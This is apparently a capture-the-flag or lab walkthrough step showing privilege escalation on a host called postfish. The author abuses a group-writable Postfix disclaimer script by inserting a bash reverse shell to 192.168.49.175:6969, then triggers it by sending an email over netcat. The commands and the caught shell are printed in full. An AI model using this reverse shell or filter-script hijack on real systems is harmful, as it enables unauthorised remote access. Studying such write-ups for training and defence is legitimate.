8. Exploit /etc/postfix/disclaimer

# this file is group-writable by 'filter', so any member of that group can change what it executes
brian.moore@postfish:~$ ls -la /etc/postfix/disclaimer
-rwxrwx--- 1 root filter 1184 Aug 25 00:39 /etc/postfix/disclaimer

# we are a member of group filter
brian.moore@postfish:~$ id
uid=1000(brian.moore) gid=1000(brian.moore) groups=1000(brian.moore),8(mail),997(filter)

# update /etc/postfix/disclaimer: add the following line at the top of the file
bash -i >& /dev/tcp/192.168.49.175/6969 0>&1

# either restart the service
# or send an email, to get a shell

brian.moore@postfish:/etc/postfix$ service postfix restart
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to restart 'postfix.service'.
Authenticating as: root
Password:

# cannot restart the service, as it runs as root (polkit prompts for the root password)
# sending an email instead

$ nc -vn 192.168.175.137 25
(UNKNOWN) [192.168.175.137] 25 (smtp) open
220 postfish.off ESMTP Postfix (Ubuntu)
HELO x
250 postfish.off
MAIL FROM: kashz
250 2.1.0 Ok
RCPT TO: it@postfish.off
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
YeeHaw!
-$
.
250 2.0.0 Ok: queued as 656C0458FC

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.49.175] from (UNKNOWN) [192.168.175.137] 57334
bash: cannot set terminal process group (32777): Inappropriate ioctl for device
bash: no job control in this shell
filter@postfish:/var/spool/postfix$ whoami;id
whoami;id
filter
uid=997(filter) gid=997(filter) groups=997(filter)
